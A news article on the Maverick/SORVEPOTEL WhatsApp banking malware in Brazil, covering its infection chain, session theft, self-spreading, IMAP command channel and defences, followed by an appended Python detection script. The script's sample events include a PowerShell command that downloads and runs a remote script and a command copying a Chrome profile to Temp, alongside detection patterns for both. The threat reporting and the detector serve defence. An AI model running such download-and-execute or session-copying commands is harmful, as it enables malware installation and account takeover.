NEWS WhatsApp Under the Control of Bank Hackers — The Maverick Virus Steals Browser Sessions, Infects All Your Friends, and Drains Bank Accounts

ExcalibuR



148 million people are threatened by a self-propagating Trojan. Who is next?

Researchers have uncovered a link between the known Coyote banking Trojan and the recently discovered Maverick malware, which spreads via WhatsApp. Analysts note similarities in the .NET platform used, functionality, and infection mechanisms—all pointing to a common origin and affiliation with a single cybercriminal ecosystem operating in Brazil.

Maverick was first reported by Trend Micro, whose researchers linked it to the Water Saci group. The campaign is built from two components. The first is a self-propagating module, SORVEPOTEL, distributed via the web version of WhatsApp; the second is a ZIP archive containing the main Maverick executable, which deploys the malicious payload on the victim's device. Later, Sophos and Kaspersky Lab conducted independent analyses: Sophos suggested that Maverick is an evolution of Coyote, while Kaspersky confirmed the presence of matching code segments but classified it as a separate family focused on mass attacks against Brazilian users.

A CyberProof report reveals new technical details of the infection chain. The ZIP file contains a Windows shortcut (LNK). When launched, it calls cmd.exe or PowerShell to download the first stage from a remote server—the publication mentions the domain "zapgrande[.]com". Next, the PowerShell script deploys intermediate tools, disables Microsoft Defender, and bypasses User Account Control (UAC), before downloading a .NET loader. This loader checks for analysis tools and terminates if debuggers are detected, then downloads the main components—SORVEPOTEL and Maverick.

A notable feature is the geographical filtering mechanism: Maverick installation only proceeds after confirming the infected system is in Brazil. The malware checks the time zone, system language, regional settings, and date format for this purpose. CyberProof also recorded instances where the same infrastructure was used to attack hotels—likely an expansion of the campaign's target audience.

As part of Water Saci's updated tactics, detailed by Trend Micro, the hackers moved away from .NET binaries in favor of a combination of VBScript and PowerShell. This setup allows them to hijack WhatsApp Web sessions and send infected ZIP archives to the victim's contact list. To automate the browser, the attackers download ChromeDriver and use Selenium, enabling them to simulate user actions, manage profiles, and send messages.

The typical compromise scheme begins with unpacking a ZIP archive containing an obfuscated VBS loader named "Orcamento.vbs" (aka SORVEPOTEL). This VBScript executes a PowerShell command that downloads and runs the "tadeu.ps1" script directly in memory. The script then modifies the Chrome browser profile: it terminates active processes and copies cookies, authorization tokens, and saved sessions from the user's directory to a temporary storage location. This gives the malware access to WhatsApp Web without needing to re-scan the QR code.

Control over the session allows the script to send the infected archive to all contacts while simultaneously receiving message templates from the command-and-control (C2) server. For disguise, a fake window with the text "WhatsApp Automation v6.0" is displayed, creating the illusion of a legitimate process. During the mass mailing, PowerShell iterates through each contact, inserting the recipient's name and a time-appropriate greeting into the template; it checks for a "pause" signal from the C2 server before sending to dynamically manage activity.

The communication channel in SORVEPOTEL is implemented unusually: instead of standard HTTP, it uses the IMAP protocol. The backdoor connects to a mailbox at terra.com[.]br with hardcoded credentials and reads commands from incoming emails. Some accounts are protected by multi-factor authentication (MFA), forcing the operators to manually enter one-time codes to log in. This slows down operations but provides stealth. After receiving a new C2 server URL, the malware regularly polls it and executes the received instructions.

The list of supported commands covers the full range of post-exploitation functions:

  • Gathering system information (INFO)
  • Executing commands via cmd.exe (CMD) or PowerShell (POWERSHELL)
  • Taking screenshots (SCREENSHOT)
  • Viewing the process list (TASKLIST)
  • Terminating specified tasks (KILL)
  • Working with files and directories (LIST_FILES, DOWNLOAD_FILE, UPLOAD_FILE, DELETE, RENAME, COPY, MOVE, FILE_INFO, SEARCH, CREATE_FOLDER)
  • Additional functions for reboot (REBOOT), shutdown (SHUTDOWN), self-update (UPDATE), and checking the mailbox for new C2 addresses (CHECK_EMAIL)

The management and persistence system deserves special attention: the new scheme uses multi-vector persistence and a distributed C2 infrastructure. This allows the operators to pause and resume the campaign, track the status of infected devices, and manage them as parts of a botnet. According to Trend Micro, the program only executes on devices set to the Portuguese language and region to reduce the risk of detection outside the target zone.

The threat's significance for Brazil is obvious: WhatsApp remains one of the main communication platforms in the country, with over 148 million active users. Mass-mailing the archive through stolen contact lists makes the campaign highly contagious and cheap to run, especially since stolen browser profiles let the operators bypass authentication entirely.

It is advised to strengthen control over browser and system script behavior:

  • Monitor for unauthorized copying of browser profiles.
  • Block suspicious PowerShell and VBScript calls.
  • Restrict the execution of third-party scripts using AppLocker or WDAC.
  • Keep antivirus databases up to date.
  • Monitor activity related to terra.com[.]br mailboxes and network connections to external domains like "zapgrande[.]com".

Users are advised not to open ZIP files received in messages and to pay attention to any unusual pop-up windows in the browser.
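A detection sketch for the monitoring advice above, written as an added example (not code from the article, Trend Micro, Sophos, Kaspersky or CyberProof): it runs four rules over constructed Sysmon-style process and network events, covering the script-host-to-PowerShell downloader chain, a Chrome profile copied to a temp folder, connections to the domains named in the report, and IMAP traffic from a script host. The event field names and all sample events are assumptions.

```python
import re

# Rule 1: a script host (VBS loader) or LNK-driven cmd.exe spawning PowerShell
# that fetches and runs a script in memory, as with "Orcamento.vbs" -> "tadeu.ps1".
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"downloadstring|invoke-webrequest|invoke-expression|\biex\b|\biwr\b", re.I)
# Rule 2: a Chrome profile directory copied into a temp location (session theft).
COPY_TOOLS = {"powershell.exe", "cmd.exe", "xcopy.exe", "robocopy.exe"}
PROFILE_RE = re.compile(r"user data\\(default|profile \d+)", re.I)
TEMP_RE = re.compile(r"\\temp\\", re.I)
# Rules 3 and 4: domains named in the report and IMAP from a script host.
C2_DOMAINS = {"zapgrande.com", "terra.com.br"}
IMAP_PORTS = {143, 993}

def classify(event: dict) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    image = event["image"].lower()
    if event["type"] == "process":
        parent = event["parent"].lower()
        cmd = event["cmdline"]
        if parent in SCRIPT_HOSTS and image == "powershell.exe" and DOWNLOAD_RE.search(cmd):
            hits.append("script_host_spawns_powershell_downloader")
        if image in COPY_TOOLS and PROFILE_RE.search(cmd) and TEMP_RE.search(cmd):
            hits.append("browser_profile_copied_to_temp")
    elif event["type"] == "network":
        host = event["dest"].lower()
        if any(host == d or host.endswith("." + d) for d in C2_DOMAINS):
            hits.append("known_campaign_domain")
        if event["port"] in IMAP_PORTS and image in {"powershell.exe", "wscript.exe", "cscript.exe"}:
            hits.append("script_host_imap_connection")
    return hits

# Constructed sample telemetry (not real events); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/tadeu.ps1')"},
    {"type": "process", "parent": "powershell.exe", "image": "cmd.exe",
     "cmdline": r'cmd /c xcopy /E "C:\Users\u\AppData\Local\Google\Chrome\User Data\Default" "C:\Users\u\AppData\Local\Temp\wa\"'},
    {"type": "network", "image": "powershell.exe", "dest": "imap.terra.com.br", "port": 993},
    {"type": "network", "image": "chrome.exe", "dest": "web.whatsapp.com", "port": 443},
]

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map the index of each flagged event to the rules it triggered."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(i, rules)
```

A single hit on the profile-copy or IMAP rule is worth triage on its own; the chain rule plus a campaign-domain hit on the same host is a strong signal of the full SORVEPOTEL sequence.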

The comparison of Coyote and Maverick demonstrates the evolution of banking Trojan distribution methods: attackers are moving from conventional loaders to using legitimate browser profiles and messengers, increasing the stealth and effectiveness of attacks. This shift requires defense specialists to adapt their monitoring tools and analysis automation, as well as foster close cooperation between infrastructure operators and vendors.